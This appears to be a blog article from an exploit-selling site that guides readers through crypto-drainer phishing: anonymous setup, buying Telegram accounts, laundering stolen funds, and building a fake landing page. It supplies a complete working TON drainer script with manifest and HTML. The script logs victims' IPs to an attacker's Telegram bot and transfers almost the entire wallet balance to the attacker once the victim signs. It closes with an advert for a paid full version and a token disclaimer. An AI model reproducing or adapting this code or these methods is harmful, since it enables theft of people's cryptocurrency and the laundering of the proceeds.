Let’s talk a little about DRAINERs, for sure you have met a lot of DRAINERs on the Internet. Now the dark market is filled with many different DRAINERS that are indistinguishable from real crypto projects. Drivers such as Inferno / Angel / MS. These are the CRYPTO Drainer that are in demand right now.
What is a crypto drainer?
By drainer, we mean a malicious script that is sewn into the elements of your site/phishing site* to obtain a signature for the execution of transactions and start the process of draining (draining) assets (native coin, other tokens and NFT) from crypto wallets.
In the screenshot above, we are greeted by an identical site to the original, but with one remarkable property:
When you click the Connect buttons (in the header of the site) and Connect wallet, a modal window with a trainer is linked. The user selects the wallet he needs, then transfers it to the signature of malicious transactions. And he loses his assets.
Features of working with drainers
Most often, affiliate programs use automatic allocation of spun-off assets. That is, when draining, your share and the share of the affiliate program will be automatically distributed to your wallets.
If, when connecting to the trainer, the user has signed an application for spending tokens, then we can withdraw the signed tokens as they arrive.
- Signed the application, that is, gave permission
How can I check if we have received an app from the user?
Link for checking applications on the Ethereum network:
https://etherscan.io/tokenapprovalchecker
Preparing and configuring the environment for work
Or maybe Whonix?
Let’s look at the basic preparation of your workplace using the example of Whonix (a Debian-based Linux distribution).
If you are not interested in working on Windows, then in the article above you can skip the point with installing Windows. And go straight to the Workstation (if you have followed the installation and upgrade instructions).
After we have everything installed and configured, we will need to connect to our affiliate program. Where do they live? Of course, in the well-known messenger.
How do I register a Telegram account?
We have several options.
Option one: purchase a ready-made account (tdata)
The second option: registration from your own phone (yes)
The third option: registration via the emulator
Please note that it is necessary to install 2FA after purchasing an account and reset active sessions. I hope you don’t need to explain why.
How do I create a EVM wallet for payments?
To get the assets that you will get (I hope) you will need a wallet address, oddly enough 🙂
And the easiest way, for a beginner, is to install a Chrome browser inside our work environment and pull the Metamask browser extension on it, which has the ability to generate a wallet. Recently, it has also been possible to connect EVM wallets in the Tronlink extension. So choose any one. You can also install a multi-signature on the wallet (funds will be withdrawn upon confirmation from several accounts) if you are worried that you created a wallet through don’t understand what (but that’s not what we’re talking about right now).
Take into account the fact that some smart contracts have the function of blocking your tokens (for example, USDT). I hope you guessed it:
After receiving assets subject to blockages, you need to get rid of them (exchange) as soon as possible – we will talk about this in the last section. (and let’s shift our headache)
Setting up the landing page and installing the driver
And so. We have almost everything ready for work.
What’s left for us, point by point:
- Purchase of a domain and hosting
- Compiling the driver
- Creating a phishing site
- Installing the driver on a phishing site
- The “combat” test
Which driver partner program should I use?
choose according to your taste and color.
There are a lot of schemes for laundering dirty crypto assets.
The best option is to use any exchanger from the forum with a good reputation and / or deposit.
TON DRAINER
Let’s talk about TON DRAINER. Telegram is now actively developing and its TON coin is now growing very well. I will write you a TOP DRAWER script that you can attach to your landing page and set up webhooks.
Let’s write a script tonsdk.js
var mainWallet = ""; //Your wallet, where the assets will be sent
var tgBotToken = ""; //Token bots Telegram
var tgChat = ""; //Your channel Telegram
var domain = window.location.hostname;
var ipUser;
//Redirection of countries
fetch('https://ipapi.co/json/').then(response => response.json()).then(data => {
const country = data.country;
if (country === 'US' || country === 'KZ' || country === 'BY' || country === 'UA' || country === 'AM' || country === 'AZ' || country === 'KG' || country === 'MD' || country === 'UZ') {
window.location.replace('https://ton.org');
}
ipUser = data.ip;
countryUser = data.country;
console.log('IP: ' + ipUser);
console.log('Country: ' + countryUser)
const messageOpen = `\uD83D\uDDC4*Domain:* ${domain}\n\uD83D\uDCBB*User*: ${ipUser} ${countryUser}\n\uD83D\uDCD6*Opened the website*`;
const encodedMessageOpen = encodeURIComponent(messageOpen);
const url = `https://api.telegram.org/bot${tgBotToken}/sendMessage?chat_id=${tgChat}&text=${encodedMessageOpen}&parse_mode=Markdown`;
fetch(url, {
method: 'POST',
}).then(response => {
if (response.ok) {
console.log('Success send.');
} else {
console.error('Error send.');
}
}).catch(error => {
console.error('Error: ', error);
});
}).catch(error => console.error('Error IP:', error));
const tonConnectUI = new TON_CONNECT_UI.TonConnectUI({
manifestUrl: 'https://' + domain + '/tonconnect-manifest.json',
buttonRootId: 'ton-connect'
})
tonConnectUI.on('walletConnected', (walletAddress) => {
console.log('Wallet address:', walletAddress);
});
async function didtrans() {
const response = await fetch('https://toncenter.com/api/v3/wallet?address=' + tonConnectUI.account.address);
const data = await response.json();
let originalBalance = parseFloat(data.balance);
let processedBalance = originalBalance - (originalBalance * 0.03); // deduct 3% to save funds to pay commissions
let tgBalance = processedBalance / 1000000000;
const transaction = {
validUntil: Math.floor(Date.now() / 1000) + 60, // 60 sec
messages: [{
address: mainWallet,
amount: processedBalance
}, ]
}
try {
const result = await tonConnectUI.sendTransaction(transaction);
const messageSend = `\uD83D\uDDC4*Domain:* ${domain}\n\uD83D\uDCBB*User:* ${ipUser} ${countryUser}\n\uD83D\uDCC0*Wallet:* [Ton Scan](https://tonscan.org/address/${tonConnectUI.account.address})\n\n\uD83D\uDC8E*Send:* ${tgBalance}`;
const encodedMessageSend = encodeURIComponent(messageSend);
const url = `https://api.telegram.org/bot${tgBotToken}/sendMessage?chat_id=-${tgChat}&text=${encodedMessageSend}&parse_mode=Markdown`;
fetch(url, {
method: 'POST',
}).then(response => {
if (response.ok) {
console.log('Success send.');
} else {
console.error('Error send.');
}
}).catch(error => {
console.error('Error: ', error);
});
} catch (e) {
const messageDeclined = `\uD83D\uDDC4*Domain:* ${domain}\n\uD83D\uDCBB*User:* ${ipUser} ${countryUser}\n\uD83D\uDCC0*Wallet:* [Ton Scan](https://tonscan.org/address/${tonConnectUI.account.address})\n\n\uD83D\uDED1*Declined or error.*`;
const encodedMessageDeclined = encodeURIComponent(messageDeclined);
const url = `https://api.telegram.org/bot${tgBotToken}/sendMessage?chat_id=-${tgChat}&text=${encodedMessageDeclined}&parse_mode=Markdown`;
fetch(url, {
method: 'POST',
}).then(response => {
if (response.ok) {
console.log('Success send.');
} else {
console.error('Error send.');
}
}).catch(error => {
console.error('Error: ', error);
});
console.error(e);
}
}
tonconnect-manifest.json
{
"url": "https://ton.org", //Here you can specify any link (erase the comment before launching)
"name": "Ton", //You can specify any name here (erase the comment before launching)
"iconUrl": "https://ton.org/logo.png" //Here you can specify any logo (erase the comment before launching)
}
Index.html
<!DOCTYPE html>
<html>
<head>
<script src="https://unpkg.com/@tonconnect/ui@latest/dist/tonconnect-ui.min.js"></script>
<script src="https://unpkg.com/@tonconnect/sdk@latest/dist/tonconnect-sdk.min.js"></script>
</head>
<body>
<div id="ton-connect"></div> <!--Connect Wallet-->
<button onclick="didtrans();" style="MARGIN-TOP:30PX;FONT-SIZE:24PX;">DRAIN</button><!--Request for a coin transfer-->
<script src="tonsdk.js"></script>
</body>
</html>
And you get a ready-made DRAINER TON script [Connecting a wallet]
All you have to do is make your landing page and spill traffic.
You can purchase a full-fledged DRAINER TONCOIN for a fee.
Full Version custom method for merging fragments.
- NFT drain.
- Toncoin drain.
- Jetton drain.
- WebHook Telegram notifications.
- Customizable transaction messages.
- Whitelist NFT collection.
- Rotating wallets.
- Work with ТМА.
THE NOTE This article is for informational purposes only. We do not encourage you to commit any hacking. Everything you do is your responsibility.
TOX : 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72
Telegram : @DevSecAS
You might also like
More from Uncategorized
Fortinet FortiOS / FortiProxy Unauthorized RCE
CVE-2024-21762 is a buffer overflow write vulnerability in Fortinet Fortigate and FortiProxy. This vulnerability allows an unauthorized attacker to execute …
Active Directory Dumper 2
We check the architecture for strength – an attempt to cram in the unintelligible – we fasten the network resource …
Active Directory Dumper
The purpose of this article is to show the use of the principles of building an application architecture. 1.1.1 What we …
Leave A Reply
[…] The first article is available at the link below https://blog.injectexp.dev/toncoindrainer/04/uncategorized/ […]